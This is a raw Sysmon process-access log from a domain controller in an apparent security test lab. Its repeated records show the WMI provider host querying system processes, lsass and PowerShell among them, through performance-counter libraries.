13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004969Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004968Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004967Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004966Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004965Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004964Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004963Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004962Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004961Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.548{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004960Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004959Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A3-5FCF-EC00-000000009101}3376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004958Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004957Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004956Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x80000000000000004955Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:44.533{10ACEC4A-8552-5FCF-4900-000000009101}39283964C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+167b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x80000000000000004954Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 